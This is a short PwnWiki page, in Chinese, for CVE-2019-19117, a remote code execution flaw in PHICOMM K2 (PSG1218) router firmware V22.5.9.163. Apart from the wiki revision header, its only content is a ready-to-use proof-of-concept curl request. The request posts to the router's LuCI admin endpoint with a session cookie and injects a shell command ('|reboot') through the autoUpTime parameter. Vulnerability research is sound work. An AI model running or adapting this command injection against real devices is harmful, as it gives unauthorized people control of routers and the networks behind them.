CVE-2019-19117 PHICOMM K2(PSG1218) V22.5.9.163 遠程代碼執行漏洞

From PwnWiki
Revision as of 19:17, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> curl -i -s -k -v -X'POST' -e "http://192.168.2.1/cgi-bin/luci/;stok=xxx/xxx/xxx/xxx" -b "sysauth=4a2c4bdba5fb1273ce62759fd42dba42" --data-binary "mode=1&autoUpT...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

curl -i -s -k -v -X'POST'  -e "http://192.168.2.1/cgi-bin/luci/;stok=xxx/xxx/xxx/xxx" -b "sysauth=4a2c4bdba5fb1273ce62759fd42dba42" --data-binary "mode=1&autoUpTime=02%3A05|reboot" 'http://192.168.2.1/cgi-bin/luci/;stok=xxx/admin/xxx/xxx/xxx'